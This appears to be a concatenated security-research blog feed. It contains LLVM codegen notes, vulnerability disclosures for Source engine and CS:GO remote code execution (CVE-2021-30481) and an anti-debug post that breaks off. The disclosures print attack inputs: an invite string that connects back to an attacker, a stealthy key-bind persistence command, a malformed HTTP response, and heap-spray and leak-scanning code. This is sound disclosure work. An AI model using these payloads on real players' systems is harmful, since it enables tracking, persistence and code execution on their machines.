  %7 = select i1 %8, float* %4, float* %2
  %9 = select i1 %7, float* %3, float* %9
  %9 = load float, float* %10, align 4, !tbaa !2
  ret float %9

The only candidate here is the two sequential select instructions, as they operate on the pointers created by the alloca instructions instead of the underlying value. However, LLVM also has a pass for this; if possible, LLVM will try to “speculate” across select instructions that load their results.

select instructions are essentially ternary operators that pick one of the last two operands (float pointers in our case) based on the value of the first operand.

Select speculation - where things go wrong

A few calls down the chain, this function calls isDereferenceableAndAlignedPointer, which is what determines whether a pointer can be dereferenced. The code here exposes the main issue: the select instruction is never considered ‘dereferenceable’. As such, when there are two selects in sequence (as seen with our std::clamp), it will not try to speculate the select instruction and will not remove the alloca.

Fix 1: libcxx

A potential fix is modifying the original code to not produce select instructions in the same way. For example, we can mimic our original implementation with pointers instead of value types. Though the IR output change is relatively small, this gives us the code generation we want without modifying the LLVM codebase:

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;

float clamp3(float v) {
    return better_ref_clamp(v, -1.f, 1.f);

As you can see, the IR generated after the call is inlined is significantly shorter and more efficient than before:

define dso_local float @_Z6clamp3f(float %0) local_unnamed_addr #1 {
  %2 = fcmp olt float %0, -1.000000e+00
  %3 = select i1 %2, float -1.000000e+00, float %0
  %4 = fcmp ogt float %3, 1.000000e+00
  %5 = select i1 %4, float 1.000000e+00, float %3
  ret float %5

And the corresponding assembly is back to what we want it to be:

        .long   0xbf800000                        # float -1
        .long   0x3f800000                        # float 1
clamp3(float):                                    # @clamp3(float)
        movss   xmm1, dword ptr [rip + .LCPI1_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI1_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1

Fix 2: LLVM

A much more general approach is fixing the code generation issue in LLVM itself, which could be as simple as this:

diff --git a/llvm/lib/Analysis/Loads.cpp b/llvm/lib/Analysis/Loads.cpp
index d8f954f575838d9886fce0df2d40407b194e7580..affb55c7867f48866045534d383b4d7ba19773a3 100644
--- a/llvm/lib/Analysis/Loads.cpp
+++ b/llvm/lib/Analysis/Loads.cpp
@@ -103,6 +103,14 @@ static bool isDereferenceableAndAlignedPointer(
         CtxI, DT, TLI, Visited, MaxDepth);
+  // For select instructions, both operands need to be dereferenceable.
+  if (const SelectInst *SelInst = dyn_cast<SelectInst>(V))
+    return isDereferenceableAndAlignedPointer(SelInst->getOperand(1), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth) &&
+           isDereferenceableAndAlignedPointer(SelInst->getOperand(2), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth);
   // For gc.relocate, look through relocations
   if (const GCRelocateInst *RelocateInst = dyn_cast<GCRelocateInst>(V))
     return isDereferenceableAndAlignedPointer(RelocateInst->getDerivedPtr(),

All it does is add select instructions to the list of instruction types to consider potentially dereferenceable. Though it seems to fix the issue (and alive2 seems to like it), this is otherwise untested. Also, the codegen still isn’t perfect. Though the redundant memory accesses are removed, there are still many more instructions than in our libcxx fix (and Rust’s implementation):

        .long   0x3f800000                        # float 1
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        minss   xmm1, xmm0 
        movss   xmm2, dword ptr [rip + .LCPI0_1]  # xmm2 = mem[0],zero,zero,zero
        cmpltss xmm0, xmm2
        movaps  xmm3, xmm0
        andnps  xmm3, xmm1
        andps   xmm0, xmm2
        orps    xmm0, xmm3

However, this is because of the ternary operators done in the original libcxx clamp:

template<class _Tp, class _Compare>
const _Tp& clamp(const _Tp& __v, const _Tp& __lo, const _Tp& __hi, _Compare __comp)
    _LIBCPP_ASSERT(!__comp(__hi, __lo), "Bad bounds passed to std::clamp");
    return __comp(__v, __lo) ? __lo : __comp(__hi, __v) ? __hi : __v;


The reason this doesn’t look as good is because LLVM needs to store the original value of __v for the second comparison. Due to this, it then can’t optimize the second part of this computation into a maxss as that would produce different behavior when __lo is greater than __hi and __v is negative.

const float& ref_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;

int main() {
    printf("%f\n", ref_clamp(-2.f, 1.f, -1.f));        // this prints 1.000
    printf("%f\n", better_ref_clamp(-2.f, 1.f, -1.f)); // this prints -1.000

Even though we know this is undefined behavior in C++, LLVM doesn’t have enough information to know that. Adjusting code generation accordingly would be no easy task either. Despite all of this though, it does show how versatile LLVM truly is; relatively simple changes can have significant results.

CVE-2021-30481: Source engine remote code execution via game invites

By: floesen
20 April 2021 at 00:00

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
	char pScreenshotPath[MAX_PATH];
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	CloseZip( hZip );

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
	// ...
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
	// ...

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;

	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
	// ...

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
	// ...
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;

int unzlocal_getByte(LUFILE *fin,int *pi)
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.


Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;

	repeated .CMsg_CVars.CVar cvars = 1;

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.


We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 

Preventing memory inspection on Windows

By: jm
23 May 2021 at 23:00

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

